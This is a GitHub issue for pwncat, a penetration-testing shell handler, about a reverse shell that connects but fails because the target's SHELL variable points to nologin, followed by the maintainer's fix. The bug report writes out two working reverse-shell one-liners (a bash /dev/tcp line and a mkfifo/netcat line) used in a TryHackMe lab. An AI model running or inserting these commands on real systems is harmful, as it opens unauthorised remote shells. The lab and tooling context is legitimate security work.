Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[BUG]Failed to establish shell on linux #116

Closed
3m0W33D opened this issue Jun 10, 2021 · 2 comments · Fixed by #121
Closed

[BUG]Failed to establish shell on linux #116

3m0W33D opened this issue Jun 10, 2021 · 2 comments · Fixed by #121
Labels
bug Something isn't working
Milestone
Release v0.4.1

Comments

@3m0W33D
Copy link

3m0W33D commented Jun 10, 2021
edited

If you are pasting terminal output or code snippets, place them in a code block (three backticks) in accordance with Markdown formatting for easier reading

Describe the bug
A reverse shell should be established with a bash payload, however, after waiting for a long while, no shell was established. Previously before the windows update the bash payload worked with pwncat.

Describe the target system
This https://tryhackme.com/room/wekorra room. Linux system presumably Ubuntu.

To Reproduce
Steps to reproduce the behavior:

  1. Getting rce on the web portal
  2. I enter the command bash -c 'exec bash -i &>/dev/tcp/$IP/4444 <&1'
  3. I waited for a while and then the error was shown as below.
└─$ pc  -lp 4444
[05:23:28] Welcome to pwncat 🐈!                                                                                                                                                                                               __main__.py:127
[05:24:09] received connection from 10.10.243.111:52186                                                                                                                                                                             bind.py:58
[05:24:12] 10.10.243.111:52186: registered new host w/ db                                                                                                                                                                       manager.py:491
[05:24:43] connection failed: channel recieve timed out: b' exec /usr/bin/script -qc /usr/sbin/nologin /dev/null 2>&1\nThis account is currently not available.\r\n'                                                            manager.py:491
(local) pwncat$ sessions
[05:25:29] warning: 10.10.243.111:52186: channel closed                                                                                                                                                                         manager.py:491
Traceback (most recent call last):
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/channel/socket.py", line 96, in send
    written += self.client.send(data[written:])
BrokenPipeError: [Errno 32] Broken pipe

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/commands/__init__.py", line 591, in run
    self.dispatch_line(line)
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/commands/__init__.py", line 670, in dispatch_line
    command.run(self.manager, args)
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/commands/sessions.py", line 57, in run
    session.current_user().name,
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/manager.py", line 141, in current_user
    return self.find_user(uid=self.platform.getuid())
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/manager.py", line 146, in find_user
    for user in self.run("enumerate.gather", progress=False, types=["user"]):
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/manager.py", line 196, in run
    return module.run(self, **kwargs)
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/__init__.py", line 247, in decorator
    results = [
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/__init__.py", line 247, in <listcomp>
    results = [
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/agnostic/enumerate/gather.py", line 145, in run
    for item in module.run(session, types=types):
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/__init__.py", line 247, in decorator
    results = [
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/__init__.py", line 247, in <listcomp>
    results = [
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/enumerate.py", line 193, in run
    for item in self.enumerate(session):
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/modules/linux/enumerate/user/__init__.py", line 23, in enumerate
    with passwd.open("r") as filp:
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/__init__.py", line 303, in open
    return self._target.open(
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/linux.py", line 1179, in open
    for method in self.gtfo.iter_methods(
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/gtfobins.py", line 493, in iter_methods
    path = self.which(name)
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/__init__.py", line 668, in which
    path = self._do_which(name)
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/linux.py", line 735, in _do_which
    result = self.run(
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/__init__.py", line 777, in run
    p = popen_class(
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/linux.py", line 1055, in Popen
    self.channel.send(command + b"\n")
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/channel/socket.py", line 39, in _wrapper
    return method(self, *args, **kwargs)
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/channel/socket.py", line 101, in send
    raise ChannelClosed(self) from exc
pwncat.channel.ChannelClosed: channel unexpectedly closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/__main__.py", line 266, in main
    manager.interactive()
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/manager.py", line 552, in interactive
    self.parser.run()
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/commands/__init__.py", line 605, in run
    exc.cleanup(self.manager)
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/channel/__init__.py", line 57, in cleanup
    session = manager.find_session_by_channel(self.channel)
AttributeError: 'Manager' object has no attribute 'find_session_by_channel'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/kali/tools/pwncat-env/bin/pc", line 8, in <module>
    sys.exit(main())
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/__main__.py", line 282, in main
    progress.update(task, status="done!", completed=100)
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/manager.py", line 420, in __exit__
    self.sessions[0].close()
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/manager.py", line 322, in close
    self.platform.exit()
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/platform/linux.py", line 561, in exit
    self.channel.send(b"exit\n")
  File "/home/kali/tools/pwncat-env/lib/python3.9/site-packages/pwncat/channel/socket.py", line 38, in _wrapper
    raise ChannelError(self, "channel not connected")
pwncat.channel.ChannelError: channel not connected

I also tested a reverse shell with netcat rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IP 4444 >/tmp/f, and this connection was successfully established, and I was able to interactive without any issues

Expected behavior
Connection should be establish as usual
@3m0W33D 3m0W33D added the bug Something isn't working label Jun 10, 2021
@calebstewart
Copy link
Owner

This should be a relatively easy fix. It appears that for some reason the SHELL environment variable pointed to /usr/sbin/nologin. I have no clue why that would be the case, but when spawning the pty, pwncat attempts to reuse your existing shell. This ended up just disconnecting you, because nologin simply prints a message and exits. 😫

calebstewart added a commit that referenced this issue Jun 12, 2021
@calebstewart
Checked for SHELL pointing to nologin
b9f20ec 
I'm not sure why this would happen, but it should fix #116
@calebstewart calebstewart mentioned this issue Jun 12, 2021
Merged
@Mitul16
Copy link
Contributor

Mitul16 commented Jun 14, 2021

This is not really required but since you have added a check for nologin
You may want to check for multiple SHELL values instead of just checking nologin or do the reverse that is check for SHELLs that allow login.
Some examples are below:

cat /etc/passwd | cut -d: -f7 | sort | uniq | grep -v 'sh$'

# Output ->
/bin/false
/bin/sync
/usr/sbin/nologin

@calebstewart calebstewart added this to the Release v0.4.1 milestone Jun 14, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug Something isn't working
Projects
None yet
Milestone
Release v0.4.1
Development

Successfully merging a pull request may close this issue.

Checked for SHELL pointing to nologin calebstewart/pwncat
3 participants
@calebstewart @3m0W33D @Mitul16